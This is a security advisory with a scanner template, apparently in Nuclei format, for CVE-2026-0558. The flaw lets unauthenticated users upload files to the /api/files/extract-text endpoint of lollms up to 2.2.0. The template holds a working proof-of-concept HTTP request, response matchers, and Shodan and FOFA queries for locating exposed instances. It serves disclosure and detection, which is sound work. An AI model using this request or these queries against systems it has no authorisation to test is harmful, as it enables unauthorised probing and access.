A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.
PoC
id: CVE-2026-0558
info:
name: LolLMS <= 2.2.0 - Unauthenticated File Upload
author: KoungQ
severity: critical
description: |
A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.
impact: |
Unauthenticated remote attackers can invoke server-side file processing, which can lead to denial of service through resource exhaustion, information disclosure through processing responses or errors, and bypass of intended access controls.
remediation: |
Update to a patched version containing commit a6625dc83786ff21d109b0d545ca61b770607ef3 or later. Restrict unauthenticated access to /api/files/extract-text until the update is applied.
reference:
- https://github.com/parisneo/lollms/commit/a6625dc83786ff21d109b0d545ca61b770607ef3
- https://huntr.com/bounties/0a722001-89ce-4c91-b6a6-a55ee5ba2113
- https://nvd.nist.gov/vuln/detail/CVE-2026-0558
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-0558
epss-score: 0.01936
epss-percentile: 0.78922
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
vendor: parisneo
product: lollms
shodan-query: http.html:"lollms"
fofa-query: body="lollms"
tags: cve,cve2026,lollms,auth-bypass,file-upload,intrusive
http:
- raw:
- |
POST /api/files/extract-text HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----testFormBoundary{{randstr}}
------testFormBoundary{{randstr}}
Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
Content-Type: text/plain
lollms-cve-2026-0558-{{randstr}}
------testFormBoundary{{randstr}}--
matchers:
- type: dsl
dsl:
- 'contains_all(body, "lollms-cve-2026-0558-{{randstr}}", "\"text_content\":")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100ce84d84f29cd1112dac3dd4c1b5d5d1ee9cf27ab473c88e0c1b0f8f787d3961e0220527369142519302d9aedb8cfd32df425005da1907aa1ad2e78835e5b250324be:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.